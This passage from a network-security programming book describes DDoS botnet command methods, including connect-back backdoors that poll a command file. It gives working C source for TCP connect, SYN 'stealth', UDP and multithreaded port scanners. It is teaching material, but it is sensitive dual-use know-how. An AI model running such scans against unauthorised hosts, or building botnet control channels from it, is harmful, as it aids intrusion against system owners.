Trojans usually open nonstandard ports, and border routers or firewalls often block incoming
connections on nonstandard ports. Moreover, the client has to establish a separate connection
to each of the zombies to issue a command, a rather difficult task with several thousand
zombies. Therefore, this connection method is considered obsolete and was used only in early
DDoS programs.

Another method of connecting to a zombie is based on using the Internet relay chat (IRC) 
networks. In this case, each installed Trojan is also an IRC bot that connects to an IRC net- 
work, enters a certain channel, and waits for commands from its master. This method is con- 
venient in that all the hacker has to do is log into the necessary channel and issue a command; 
the IRC server does the rest of the job. However, IRC operators can disconnect the perpetra- 
tor’s channel any time they have reason to suspect something is wrong. 

Thus, the most popular way of connecting to a zombie is to have a server that is a con- 
nect-back backdoor and a client part that is a simple text file containing a command. This text 
file can be placed anywhere on the Internet, for example, on some FTP server. At a specified 
time interval, the connect-back backdoor on each of the zombie machines downloads the text 
file with the command and executes it. In this way, to establish a connection, the client and 
the server switch places. Instead of a text file, a script in one of the Web languages, for exam- 
ple, PHP, can be used for the same purpose. In addition to issuing commands to the zombie, 
such scripts can keep statistics. 

The most popular DDoS attack utilities used to be TFN2K, Trinoo, and Stacheldraht. 
Now they are considered obsolete because they use the first method of establishing a connection 
between the client and the zombie. 
Hackers scan ports on a host to determine which of them are in the listening state.
Because most services use standard ports, this information is usually sufficient to determine
the services running in the system. For a cracker, active listening services are a potential
doorway to the system. What can turn this potential doorway into an actual one is an improperly
configured computer security system or bugs in the system’s software. The most well-known
and powerful port scanner is nmap by Fyodor, available from http://www.insecure.org/nmap.
This utility offers about ten scanning modes and has lots of other useful features. Simply type
nmap -h to see a reference page listing all options. Most of the scanning methods used in the
utility were developed by Fyodor.

The essence of all scanning methods comes down to this: The utility sends a packet of
a certain type to the specified port of the host being explored and, by examining the reply
from the host, determines whether the port is open. In this way, all ports in the specified
range are checked (on every host of an address range, if the scanner supports the host range
option).

I want to emphasize that whenever I say “open port” in this chapter, I mean a port that 
is in the listening state. A port that is simply open is not necessarily in the listening state; 
for example, this happens when ports are dynamically assigned in outgoing connections. 
It is ports that are in the listening state that a port scanner detects. Such ports are opened by 
server applications (i.e., services or daemons).

This chapter considers implementations of all the main port scanning methods individually.
Once you understand how each method works, you will be able to combine
them into a single utility on your own. The source codes for all programs in this chapter can be
found in the /PART II/Chapter 7 directory on the accompanying CD-ROM.
7.1. TCP Connect Scan


The TCP connect scan is the simplest scan method, and it was used in the first port scanners.
The source code for a program implementing a port scanner based on this method is shown in
Listing 7.1. A TCP connect port scanner attempts to establish a TCP connection to each port
under investigation following the complete procedure: a three-way handshake, during which
SYN, SYN/ACK, and ACK messages are exchanged between the client and the server. This type of
connection is established using the connect() function, employed in the custom port scanner
under consideration. If the connect() function returns 0, the connection
was established successfully; that is, the port is in the listening state. In this case, the
getservbyport() function is called, which returns information about the service running on
the given port. This function returns a pointer to a servent structure, whose s_name field
contains the official name of the service. A NULL pointer returned by the function means that it
could not determine the service by the port number. In this case, (unknown) is output for the
particular port number.

The following arguments must be passed to the scanner in the command line: the address 
of the probed host and the starting and the ending number of the port range to probe. 

The program is compiled as usual: 

# gcc tcpscan.c -o tcpscan

The program is run and its results are viewed as follows:

# ./tcpscan 192.168.10.1 0 10000

Running scan...

Open: 80 (http)

Open: 135 (unknown)

Open: 139 (netbios-ssn)

Open: 445 (microsoft-ds)





Listing 7.1. A TCP connect port scanner (tcpscan.c) 





#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

int main(int argc, char *argv[])
{
    int sd;
    struct hostent* hp;
    struct sockaddr_in servaddr;
    struct servent *srvport;
    int port, portlow, porthigh;

    if (argc != 4) {
        fprintf(stderr, "Usage: %s <address> <portlow> <porthigh>\n",
                argv[0]);
        exit(-1);
    }

    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    portlow = atoi(argv[2]);
    porthigh = atoi(argv[3]);

    fprintf(stderr, "Running scan...\n");

    for (port = portlow; port <= porthigh; port++) {
        /* A new socket is needed for every connection attempt */
        if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
            perror("socket() failed");
            exit(-1);
        }

        bzero(&servaddr, sizeof(servaddr));
        servaddr.sin_family = AF_INET;
        servaddr.sin_port = htons(port);
        servaddr.sin_addr = *((struct in_addr *)hp->h_addr);

        /* A completed handshake means the port is listening */
        if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == 0) {
            srvport = getservbyport(htons(port), "tcp");
            if (srvport == NULL)
                printf("Open: %d (unknown)\n", port);
            else
                printf("Open: %d (%s)\n", port, srvport->s_name);
            fflush(stdout);
        }
        close(sd);
    }
    printf("\n");

    return 0;
}





7.2. SYN, FIN, Xmas, Null, and ACK Scans 


I consider the TCP SYN scan in detail first and then describe the FIN, Xmas, Null, and ACK scans.
The programming approaches to implementing all of these methods are similar.

The TCP SYN scan is also called half-open scanning because it does not open a complete TCP
connection. The process is started as usual by sending a SYN message and waiting for the reply.
If the remote machine responds with SYN/ACK, you know that the given port is in the listening
state. Because this is the piece of information you are interested in, you don’t have to proceed
with opening a full connection; instead, you send the remote machine an RST/ACK message to
tear down the nascent connection. Many systems do not log such unfinished connections,
so this gives scanning a certain degree of stealth. The source code for a program implementing
a stealth port scanner is shown in Listing 7.2.

The connect() function cannot be used because it opens a full connection; thus, the only
way to proceed is to fill in the TCP header yourself (the IP header is still filled in by the
IP subsystem) and send the packet through a raw socket. The TCP header checksum is calculated
using a pseudo header (see Section 3.6). In the pseudo header, the source IP address field
(unsigned int source_address) must be filled in. To save the user the trouble of specifying the
local IP address, it is determined programmatically using the following code:

#define DEVICE "eth0"

struct ifreq ifr;
struct sockaddr_in source;

/* Obtaining the IP address of the interface and placing it into the
   source address structure */
snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", DEVICE);
ioctl(sd, SIOCGIFADDR, &ifr);
memcpy(&source, &ifr.ifr_addr, sizeof(struct sockaddr));

The IP address of the eth0 interface is determined in this case, but other interfaces (ppp0,
le0, lo0, etc.) can be active in a real-world situation. Therefore, a full-fledged scanner should
obtain a list of all interfaces first. This task can be accomplished by calling the ioctl()
function with the SIOCGIFCONF parameter.

In the header of the outgoing TCP packet, the SYN flag is set (tcp_hdr.syn = 1), and in the
received packet, the SYN and ACK flags (tcphdr->syn == 1 && tcphdr->ack == 1) are checked.
If both of the latter flags are set, the given port is in the listening state. To pick out the
packets addressed to this process, the program places the PID of the current process into the
source port number field of the TCP header of outgoing packets (tcp_hdr.source = getpid())
and checks this value in the received packets (tcphdr->dest == getpid()). Because the port field
is only 16 bits wide, only the low 16 bits of the PID are actually used. Note that in the received
packet, the destination (dest) and not the source (source) port number field is checked.
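The same reply test can be written against the raw bytes of the TCP header. This makes explicit where the fields sit: the destination port is in bytes 2 and 3 (big-endian), and the flags are in byte 13. The bit values and offsets come from the TCP header layout in RFC 793. The function name and the FLAG_* constants are hypothetical, and the port argument is assumed to be in host byte order.

```c
#include <stdint.h>

/* TCP flag bits in byte 13 of the TCP header (RFC 793 layout). */
#define FLAG_FIN 0x01
#define FLAG_SYN 0x02
#define FLAG_RST 0x04
#define FLAG_ACK 0x10

/* Interpret a reply to a SYN probe.
   seg      - start of the TCP header in the received packet
   our_port - source port used for the probe, in host byte order
   Returns 1 (listening), 0 (closed), or -1 (not a reply to our probe). */
int syn_reply_state(const uint8_t *seg, uint16_t our_port)
{
    uint16_t dest = (uint16_t)(seg[2] << 8 | seg[3]);  /* destination port */
    uint8_t flags = seg[13];

    if (dest != our_port)
        return -1;
    if ((flags & (FLAG_SYN | FLAG_ACK)) == (FLAG_SYN | FLAG_ACK))
        return 1;
    if (flags & FLAG_RST)
        return 0;
    return -1;
}
```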


Listing 7.2. A TCP SYN (stealth) port scanner (halfscan.c) 


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/if.h>
#include <linux/ip.h>
#include <linux/tcp.h>
#include <netdb.h>
#include <sys/ioctl.h>

#define DEVICE "eth0"

/*--------------------------------------------------------*/
/* Calculating the checksum                               */
/*--------------------------------------------------------*/
unsigned short in_cksum(unsigned short *addr, int len)
{
    unsigned short result;
    unsigned int sum = 0;

    /* Adding all 2-byte words */
    while (len > 1) {
        sum += *addr++;
        len -= 2;
    }

    /* If there is a byte left over, adding it to the sum */
    if (len == 1)
        sum += *(unsigned char*) addr;

    sum = (sum >> 16) + (sum & 0xFFFF);  /* Adding the carry */
    sum += (sum >> 16);                  /* Adding the carry again */
    result = ~sum;                       /* Inverting the result */

    return result;
}

/*--------------------------------------------------------*/
/* Assembling and sending a packet                        */
/*--------------------------------------------------------*/
void send_packet(int sd, unsigned short port, struct sockaddr_in source,
                 struct hostent* hp)
{
    struct sockaddr_in servaddr;
    struct tcphdr tcp_hdr;

    /* Pseudo packet structure */
    struct pseudo_hdr
    {
        unsigned int source_address;
        unsigned int dest_address;
        unsigned char place_holder;
        unsigned char protocol;
        unsigned short length;
        struct tcphdr tcp;
    } pseudo_hdr;

    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(port);
    servaddr.sin_addr = *((struct in_addr *)hp->h_addr);

    /* Filling the TCP header; the low 16 bits of the PID serve as the
       source port, so that replies can be matched in recv_packet() */
    tcp_hdr.source = getpid();
    tcp_hdr.dest = htons(port);
    tcp_hdr.seq = htonl(getpid() + port);
    tcp_hdr.ack_seq = 0;
    tcp_hdr.res1 = 0;
    tcp_hdr.doff = 5;
    tcp_hdr.fin = 0;
    tcp_hdr.syn = 1;
    tcp_hdr.rst = 0;
    tcp_hdr.psh = 0;
    tcp_hdr.ack = 0;
    tcp_hdr.urg = 0;
    tcp_hdr.ece = 0;
    tcp_hdr.cwr = 0;
    tcp_hdr.window = htons(128);
    tcp_hdr.check = 0;
    tcp_hdr.urg_ptr = 0;

    /* Filling the pseudo header */
    pseudo_hdr.source_address = source.sin_addr.s_addr;
    pseudo_hdr.dest_address = servaddr.sin_addr.s_addr;
    pseudo_hdr.place_holder = 0;
    pseudo_hdr.protocol = IPPROTO_TCP;
    pseudo_hdr.length = htons(sizeof(struct tcphdr));

    /* Pasting the filled TCP header after the pseudo header */
    bcopy(&tcp_hdr, &pseudo_hdr.tcp, sizeof(struct tcphdr));

    /* Calculating the TCP header checksum */
    tcp_hdr.check = in_cksum((unsigned short *)&pseudo_hdr,
                             sizeof(struct pseudo_hdr));

    /* Sending the TCP packet (the kernel adds the IP header) */
    if (sendto(sd,
               &tcp_hdr,
               sizeof(struct tcphdr),
               0,
               (struct sockaddr *)&servaddr,
               sizeof(servaddr)) < 0)
        perror("sendto() failed");
}

/*--------------------------------------------------------*/
/* Receiving the reply packet and checking the flags      */
/*--------------------------------------------------------*/
int recv_packet(int sd)
{
    char recvbuf[1500];
    struct tcphdr *tcphdr = (struct tcphdr *)(recvbuf +
                            sizeof(struct iphdr));

    while (1)
    {
        if (recv(sd, recvbuf, sizeof(recvbuf), 0) < 0)
            perror("recv() failed");

        /* Only replies addressed to our "port" (the truncated PID) count */
        if (tcphdr->dest == (unsigned short)getpid()) {
            if (tcphdr->syn == 1 && tcphdr->ack == 1)
                return 1;
            else
                return 0;
        }
    }
}

/*--------------------------------------------------------*/
/* The main() function                                    */
/*--------------------------------------------------------*/
int main(int argc, char *argv[])
{
    int sd;
    struct ifreq ifr;
    struct hostent* hp;
    int port, portlow, porthigh;
    struct sockaddr_in source;
    struct servent* srvport;

    if (argc != 4) {
        fprintf(stderr, "Usage: %s <address> <portlow> <porthigh>\n",
                argv[0]);
        exit(-1);
    }

    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    portlow = atoi(argv[2]);
    porthigh = atoi(argv[3]);

    if ((sd = socket(PF_INET, SOCK_RAW, IPPROTO_TCP)) < 0) {
        perror("socket() failed");
        exit(-1);
    }

    fprintf(stderr, "Running scan...\n");

    /* Obtaining the IP address of the interface and placing it into the
       source address structure */
    snprintf(ifr.ifr_name, sizeof(ifr.ifr_name), "%s", DEVICE);
    ioctl(sd, SIOCGIFADDR, &ifr);
    memcpy(&source, &ifr.ifr_addr, sizeof(struct sockaddr));

    for (port = portlow; port <= porthigh; port++) {
        send_packet(sd, port, source, hp);
        if (recv_packet(sd) == 1) {
            srvport = getservbyport(htons(port), "tcp");
            if (srvport == NULL)
                printf("Open: %d (unknown)\n", port);
            else
                printf("Open: %d (%s)\n", port, srvport->s_name);
            fflush(stdout);
        }
    }

    close(sd);
    return 0;
}


The essence of the other TCP scans amounts to the following: 


❑ TCP FIN scan. A FIN packet is sent to the probed host. Pursuant to RFC 793, the host
must reply with an RST packet for closed ports. No RST reply to a FIN message means that
the particular port is open (or that a firewall filters it). This method cannot be used against
Windows systems, because, as usual, Microsoft went its own way: its operating systems reply
with RST whether or not the port is open, so every port appears closed.

❑ TCP Xmas scan. A packet with the FIN|URG|PUSH flags set is sent to the probed host.
Pursuant to RFC 793, the probed host must reply with an RST message for all closed ports.

❑ TCP null scan. The host is probed with packets with all of the flags cleared. Pursuant to
RFC 793, the probed host must reply with an RST message for all closed ports.

❑ TCP ACK scan. This method makes it possible to determine whether a port is protected
by a firewall. An ACK packet is sent to the probed host. An RST reply packet classifies the
port as unfiltered by a firewall. No reply (or an ICMP error) places the port into the filtered
category.
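The rules above fit in a small lookup. The sketch below encodes the probe flags for each scan and the meaning of each kind of reply, following the RFC 793 behavior described in the list. All the enum names and both functions are hypothetical, and the reply categories are simplified to none, RST, or SYN/ACK.

```c
/* Hypothetical encoding of the scan rules described above. */
enum scan  { SCAN_SYN, SCAN_FIN, SCAN_XMAS, SCAN_NULL, SCAN_ACK };
enum reply { REPLY_NONE, REPLY_RST, REPLY_SYNACK };
enum state { ST_OPEN, ST_CLOSED, ST_OPEN_OR_FILTERED,
             ST_FILTERED, ST_UNFILTERED };

/* Flags placed in the probe (TCP flag bit values from RFC 793). */
unsigned char probe_flags(enum scan s)
{
    switch (s) {
    case SCAN_SYN:  return 0x02;               /* SYN */
    case SCAN_FIN:  return 0x01;               /* FIN */
    case SCAN_XMAS: return 0x01 | 0x20 | 0x08; /* FIN|URG|PSH */
    case SCAN_NULL: return 0x00;               /* no flags */
    case SCAN_ACK:  return 0x10;               /* ACK */
    }
    return 0;
}

/* What a given reply says about the port for a given scan type. */
enum state classify(enum scan s, enum reply r)
{
    if (s == SCAN_ACK)
        return r == REPLY_RST ? ST_UNFILTERED : ST_FILTERED;
    if (s == SCAN_SYN) {
        if (r == REPLY_SYNACK) return ST_OPEN;
        if (r == REPLY_RST)    return ST_CLOSED;
        return ST_FILTERED;                    /* no answer at all */
    }
    /* FIN, Xmas, Null: a closed port answers with RST; an open one is silent */
    return r == REPLY_RST ? ST_CLOSED : ST_OPEN_OR_FILTERED;
}
```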


As you can see, all of the preceding scans can be implemented along the lines of Listing 7.2.
The only differences are the flags set in the outgoing packets and the flags examined in the
received packets. All of these methods can be combined into one utility, with the needed one
selected by a command-line option, the way the nmap utility does it.


7.3. UDP Scan 


As is well known, TCP and UDP services can use the same port number, for example,
www-http 80/tcp and 80/udp. Thus, a TCP scan cannot detect a listening UDP port.
This situation calls for a UDP port scanner. The source code for such a scanner is shown
in Listing 7.3. In general, only one UDP scanning method is used: A UDP packet is sent to
each port of the host under investigation and the reply is examined. The ICMP “port
unreachable” reply means that the port is closed. No reply is taken to mean that the port is open
(strictly speaking, open or filtered). Because the scanner has to wait a certain time for the ICMP
reply, UDP scanning is much slower than any of the TCP scan methods. Moreover, because routers
and firewalls often block ICMP “port unreachable” messages, this UDP scanning method often
produces false results.
Some UDP scanners use a more reliable and faster scanning technique consisting of querying
remote UDP services for answers. This, however, requires you to know how to generate a proper 
query and how to receive answers from each UDP service. This method is beyond the scope of 
this book; however, you should be able to implement it on your own. All it takes is to discover 
the necessary information about how each UDP service operates, which can be found in the cor- 
responding documentation. 

The UDP scanner shown in Listing 7.3 creates two sockets: a datagram socket for
sending UDP packets and a raw socket for receiving ICMP replies. UDP packets are
sent to a specific port by the send_packet() function, with the data field of each packet filled
with the "Regards from Ivan Sklyaroff!" phrase instead of being left empty, which is what most
UDP scanners do. The reply packets are received by the recv_packet() function. Because the
scanner needs some time to wait for the ICMP reply to arrive, a 1-second delay is built into the
recv_packet() function with the help of the select() function and the FD_ZERO and FD_SET
macros. This solution, however, is not efficient, because 1 second may not be enough to receive
the ICMP reply or, on the contrary, may be too much and slow the scanner unnecessarily. Thus,
many scanners, nmap in particular, measure the round-trip time of ICMP messages and adjust
the delay accordingly. The round-trip time can be determined as it was done in the ping and
traceroute utilities (see Chapters 4 and 5): The current system time is obtained using the
gettimeofday() function and saved in the data field of an ICMP echo request packet, which is
then sent. When the echo reply is received, the current system time is obtained again, and the
difference between the current system time and the time saved in the packet is the round-trip
time sought. To add this capability to your program, you will have to use a raw socket not only
to receive but also to send ICMP messages.
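The time arithmetic and one way of turning measured round-trip times into a wait time are sketched below. rtt_usec() computes the difference described in the text. The estimator in next_timeout_usec() is an assumption borrowed from TCP's retransmission timer (RFC 6298: smoothed RTT plus four times the mean deviation). It is not nmap's actual algorithm. Both function names and struct rtt_est are hypothetical.

```c
#include <sys/time.h>

/* Round-trip time in microseconds between the time stamp saved in the
   outgoing packet (sent) and the moment the reply arrived (now). */
long rtt_usec(const struct timeval *sent, const struct timeval *now)
{
    return (long)(now->tv_sec - sent->tv_sec) * 1000000L
         + (long)(now->tv_usec - sent->tv_usec);
}

/* Smoothed RTT estimator in the style of RFC 6298 (an assumption here). */
struct rtt_est {
    long srtt;     /* smoothed round-trip time, microseconds */
    long rttvar;   /* mean deviation, microseconds */
    int primed;    /* 0 until the first sample arrives */
};

/* Feed one RTT sample; returns the wait time to use for the next reply. */
long next_timeout_usec(struct rtt_est *e, long sample)
{
    if (!e->primed) {
        e->srtt = sample;
        e->rttvar = sample / 2;
        e->primed = 1;
    } else {
        long err = sample - e->srtt;     /* uses the old srtt, as RFC 6298 does */
        if (err < 0)
            err = -err;
        e->rttvar = (3 * e->rttvar + err) / 4;   /* beta = 1/4 */
        e->srtt = (7 * e->srtt + sample) / 8;    /* alpha = 1/8 */
    }
    return e->srtt + 4 * e->rttvar;
}
```

In a scanner, the value returned by next_timeout_usec() would replace the fixed 1-second tv_sec/tv_usec pair passed to select().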

The recv_packet() function also parses the headers of each received ICMP packet to
determine whether the ICMP “port unreachable” message or some other message was received.
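The recv_packet() function in Listing 7.3 assumes that any "port unreachable" message belongs to the port it has just probed. A more careful scanner can look inside the error message. An ICMP error quotes the IP header of the offending datagram, followed by the first 8 bytes of that datagram's payload, which here is the UDP header. The sketch below relies on that layout. unreachable_port() is a hypothetical helper, and it works on raw bytes instead of struct icmp.

```c
#include <stddef.h>
#include <stdint.h>

/* Given a raw-socket buffer (IP header followed by an ICMP message),
   return the UDP destination port of the probe that triggered an ICMP
   "port unreachable" (type 3, code 3), or -1 for anything else. */
int unreachable_port(const uint8_t *buf, size_t len)
{
    size_t ihl, inner, inner_ihl;

    if (len < 20)
        return -1;
    ihl = (size_t)(buf[0] & 0x0F) * 4;          /* outer IP header length */
    if (len < ihl + 8)
        return -1;
    if (buf[ihl] != 3 || buf[ihl + 1] != 3)     /* type 3, code 3 */
        return -1;

    inner = ihl + 8;                            /* quoted IP header */
    if (len < inner + 20)
        return -1;
    inner_ihl = (size_t)(buf[inner] & 0x0F) * 4;
    if (buf[inner + 9] != 17)                   /* quoted protocol must be UDP */
        return -1;
    if (len < inner + inner_ihl + 4)
        return -1;
    /* Destination port is bytes 2-3 of the quoted UDP header */
    return buf[inner + inner_ihl + 2] << 8 | buf[inner + inner_ihl + 3];
}
```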





Listing 7.3. A UDP port scanner (udpscan.c) 





#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <unistd.h>
#include <strings.h>

void send_packet(int sendsock, unsigned short port, struct hostent* hp)
{
    struct sockaddr_in servaddr;
    char sendbuf[] = "Regards from Ivan Sklyaroff!";

    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(port);
    servaddr.sin_addr = *((struct in_addr *)hp->h_addr);

    if (sendto(sendsock, sendbuf, sizeof(sendbuf), 0,
               (struct sockaddr *)&servaddr, sizeof(servaddr)) < 0) {
        perror("sendto() failed");
    }
}

int recv_packet(int recvsock)
{
    unsigned char recvbuf[1500];
    struct icmp *icmp;
    struct ip *iphdr;
    int iplen;
    fd_set fds;
    struct timeval wait;

    /* 1-second budget; on Linux, select() decreases wait by the time
       already spent, so the budget covers the whole loop */
    wait.tv_sec = 1;
    wait.tv_usec = 0;

    while (1) {
        FD_ZERO(&fds);
        FD_SET(recvsock, &fds);

        if (select(recvsock + 1, &fds, NULL, NULL, &wait) > 0) {
            recvfrom(recvsock, recvbuf, sizeof(recvbuf), 0, NULL, NULL);
        } else if (!FD_ISSET(recvsock, &fds))
            return 1;      /* timeout: no ICMP reply, port considered open */
        else
            perror("recvfrom() failed");

        iphdr = (struct ip *)recvbuf;
        iplen = iphdr->ip_hl << 2;

        icmp = (struct icmp *)(recvbuf + iplen);

        if ((icmp->icmp_type == ICMP_UNREACH) &&
            (icmp->icmp_code == ICMP_UNREACH_PORT))
            return 0;      /* "port unreachable": port is closed */
    }
}

int main(int argc, char *argv[])
{
    int sendsock, recvsock;
    int port, portlow, porthigh;
    struct hostent* hp;
    struct servent* srvport;

    if (argc != 4) {
        fprintf(stderr, "Usage: %s <address> <portlow> <porthigh>\n",
                argv[0]);
        exit(-1);
    }

    hp = gethostbyname(argv[1]);
    if (hp == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    portlow = atoi(argv[2]);
    porthigh = atoi(argv[3]);

    if ((sendsock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) < 0) {
        perror("sendsock failed");
        exit(-1);
    }

    if ((recvsock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
        perror("recvsock failed");
        exit(-1);
    }

    fprintf(stderr, "Running scan...\n");

    for (port = portlow; port <= porthigh; port++) {
        send_packet(sendsock, port, hp);
        if (recv_packet(recvsock) == 1) {
            srvport = getservbyport(htons(port), "udp");
            if (srvport == NULL)
                printf("Open: %d (unknown)\n", port);
            else
                printf("Open: %d (%s)\n", port, srvport->s_name);
            fflush(stdout);
        }
    }

    return 0;
}


7.4. Multithreaded Port Scanner 


Program performance can be improved in several ways, one of which is adding multithreading support. Listing 7.4, later in this section, shows the source code of the TCP connect port scanner from Section 7.1 with multithreading support added. The program is compiled as usual:


# gcc ptscan.c -o ptscan -lpthread 


When the modified scanner is run, the number of threads to create is passed to it as the fourth command-line parameter:
# ptscan 192.168.10.1 1 10000 20 


This command tells the utility to scan ports 1 through 10,000 on host 192.168.10.1 using 20 threads. You can display a list of the running threads by executing the ps -a command in another terminal on the same machine. The ps command is supposed to show running processes, but with the older LinuxThreads library, the pthread_create() function actually creates a new process that executes the thread (although this is not the same kind of process that the fork() function creates). This is why the ps command shows threads. Note that even though 20 threads were specified in the command line, the ps command actually shows 22 of them. The 2 "extra" threads are the main program thread and the manager thread, which is part of the internal LinuxThreads mechanism. With the newer NPTL implementation, there is no manager thread, and ps lists individual threads only when asked to, for example, with ps -L.

Implementing the multithreaded port scanner is quite simple. In the main() function, the pthread_create() function is called in a loop to create the required number of threads. Each created thread runs the scan() function, which receives the first command-line argument (argv[1]). In a similar loop, the pthread_join() function is called to wait for each thread to finish. The scan() function converts the address of the remote host, fills the address structure, creates a socket, and connects to the specified port with the help of the connect() function. It then examines the result returned by connect() to determine whether the port is in the listening mode (see Section 7.1).

I have seen numerous multithreaded programs in which each thread exits after its function finishes and a new thread is created in its place, thereby maintaining the specified number of threads. This port scanner takes a different approach. Here, threads are created when the scanner starts and are not terminated while there are unscanned ports left, in essence until the scanner finishes. This is achieved by storing the port number (port) in a global variable, which is incremented in each thread. Whether the maximum port value has been reached is checked in the while (port < porthigh) loop, which is also executed in each thread.

Because the system can give the processor to any of the threads at any time and in any part of the code, the port scanner may not work as intended. For example, two threads may increment the global variable port before a third thread uses the resulting value to connect to the remote port, so one port is skipped. To prevent this, threads are synchronized using a mutual exclusion (mutex) object. The portion of the program in which simultaneous access by threads may cause faulty execution (the critical section) is delimited as follows:

/* Critical section start */
pthread_mutex_lock(&lock);
...
pthread_mutex_unlock(&lock);
/* Critical section end */

This prevents other threads from entering this portion of the code until the current thread finishes executing it. In the critical section, the sin_port field of the address structure is filled, the connect() function is called, the results are output to the screen, the global variable port is incremented, and the socket descriptor (sd) is closed.
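The shared-counter idea can be tried in isolation. The following is a minimal sketch, not part of ptscan.c: the names run_claim_demo(), demo_worker(), and the DEMO_ constants are hypothetical. Several threads take port numbers from one global counter, and because the bounds check and the increment happen inside the same critical section, every port in the range is handed out exactly once. Here the "work" is only a counter update, so the sketch says nothing about scanning speed; compile it with -lpthread on older systems.

```c
#include <pthread.h>

/* Hypothetical demo values, not taken from ptscan.c */
#define DEMO_THREADS 8
#define DEMO_LOW     1
#define DEMO_HIGH    1000               /* inclusive */

static int next_port = DEMO_LOW;        /* shared, like `port` in ptscan.c */
static int claimed[DEMO_HIGH + 1];      /* how often each port was taken */
static pthread_mutex_t demo_lock = PTHREAD_MUTEX_INITIALIZER;

/* Each thread repeatedly takes the next unscanned port. The check and
   the increment are done under one lock, so no port is taken twice. */
static void *demo_worker(void *arg)
{
    (void)arg;
    for (;;) {
        int p;
        pthread_mutex_lock(&demo_lock);
        if (next_port > DEMO_HIGH) {    /* nothing left to hand out */
            pthread_mutex_unlock(&demo_lock);
            break;
        }
        p = next_port++;
        claimed[p]++;                   /* stands in for "probe port p" */
        pthread_mutex_unlock(&demo_lock);
    }
    return NULL;
}

/* Runs the workers; returns the number of ports not claimed exactly
   once (0 means the hand-out was race-free), or -1 if no thread started. */
int run_claim_demo(void)
{
    pthread_t t[DEMO_THREADS];
    int i, created = 0, bad = 0;

    for (i = 0; i < DEMO_THREADS; i++) {
        if (pthread_create(&t[i], NULL, demo_worker, NULL) != 0)
            break;
        created++;
    }
    if (created == 0)
        return -1;
    for (i = 0; i < created; i++)
        pthread_join(t[i], NULL);

    for (i = DEMO_LOW; i <= DEMO_HIGH; i++)
        if (claimed[i] != 1)
            bad++;
    return bad;
}
```

Calling run_claim_demo() once should return 0; removing the lock and unlock calls from demo_worker() is a quick way to see the race described above.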
Although a multithreaded scanner is an improvement over its single-threaded counterpart, it has its own shortcomings, which are discussed in the next section.





Listing 7.4. A multithreaded port scanner (ptscan.c) 





#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* close() */
#include <pthread.h>

#define THREADS_MAX 255

int port, portlow, porthigh;
pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;

void *scan(void *arg)
{
    int sd;
    struct sockaddr_in servaddr;
    struct servent *srvport;
    struct hostent* hp;

    char *argv1 = (char*)arg;

    /* gethostbyname() returns static data, so call it under the lock */
    pthread_mutex_lock(&lock);
    hp = gethostbyname(argv1);

    if (hp == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    bzero(&servaddr, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_addr = *((struct in_addr *)hp->h_addr);
    pthread_mutex_unlock(&lock);

    while (port < porthigh)
    {
        if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
            perror("socket() failed");
            exit(-1);
        }

        /* Critical section start */
        pthread_mutex_lock(&lock);
        /* Another thread may have taken the last port in the meantime */
        if (port >= porthigh) {
            pthread_mutex_unlock(&lock);
            close(sd);
            break;
        }
        servaddr.sin_port = htons(port);

        if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == 0)
        {
            srvport = getservbyport(htons(port), "tcp");

            if (srvport == NULL)
                printf("Open: %d (unknown)\n", port);
            else
                printf("Open: %d (%s)\n", port, srvport->s_name);
            fflush(stdout);
        }

        port++;
        close(sd);
        pthread_mutex_unlock(&lock);
        /* Critical section end */
    }

    return NULL;
}

int main(int argc, char *argv[])
{
    pthread_t threads[THREADS_MAX];
    int thread_num;
    int i;

    if (argc != 5) {
        fprintf(stderr, "Usage: %s <address> <portlow> <porthigh> <num_threads>\n", argv[0]);
        exit(-1);
    }

    thread_num = atoi(argv[4]);
    if (thread_num < 1 || thread_num > THREADS_MAX) {
        fprintf(stderr, "invalid number of threads (1-%d)\n", THREADS_MAX);
        exit(-1);
    }

    portlow = atoi(argv[2]);
    porthigh = atoi(argv[3]) + 1;   /* +1 so that porthigh itself is scanned */
    port = portlow;

    fprintf(stderr, "Running scan...\n");
    for (i = 0; i < thread_num; i++)
        if (pthread_create(&threads[i], NULL, scan, argv[1]) != 0) {
            fprintf(stderr, "error creating thread\n");
            exit(-1);
        }

    for (i = 0; i < thread_num; i++)
        pthread_join(threads[i], NULL);

    return 0;
}




7.5. A Port Scanner on Nonblocking Sockets 


